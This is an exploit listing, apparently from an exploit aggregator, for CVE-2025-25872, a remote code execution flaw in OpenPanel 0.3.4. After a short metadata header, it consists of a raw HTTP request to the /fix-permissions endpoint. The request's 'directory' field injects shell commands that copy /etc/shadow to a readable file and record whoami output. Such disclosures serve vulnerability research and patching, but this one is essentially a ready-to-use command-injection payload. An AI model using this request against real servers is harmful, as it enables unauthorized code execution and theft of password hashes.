Exploit for OpenPanel 0.3.4 Remote Code Execution CVE-2025-25872

Name: Exploit for OpenPanel 0.3.4 Remote Code Execution CVE-2025-25872
Rating: 5 (102 reviews)

2025-03-05 | CVSS 8.3

## https://sploitus.com/exploit?id=PACKETSTORM:189583
# Exploit Title: OpenPanel 0.3.4 - Remote Code Execution via Fix Permission
    # Date: Nov 7, 2024
    # Exploit Author: Punthat Siriwan, Korn Chaisuwan, Pongtorn Angsuchotmetee 
    # Vendor Homepage: https://openpanel.com/
    # Software Link: https://openpanel.com/
    # Version: 0.3.4
    # Tested on: macOS
    # CVE : CVE-2025-25872
    
    POST /fix-permissions HTTP/2
    Host: demo.openpanel.org:2083
    Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyOFQ.ilfMmYNxLNnGlJ8NtQ5-25YRLQ0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://demo.openpanel.org:2083/fix-permissions
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 146
    Origin: https://demo.openpanel.org:2083
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Priority: u=0
    Te: trailers
    
    directory=%2Fhome%2Fstefan%2F%3B%20cat%20%2Fetc%2Fshadow%20%3E%20%2Fhome%2Fstefan%2Fshadow.txt%3B%20whoami%20%3E%20%2Fhome%2Fstefan%2Frce_test.txt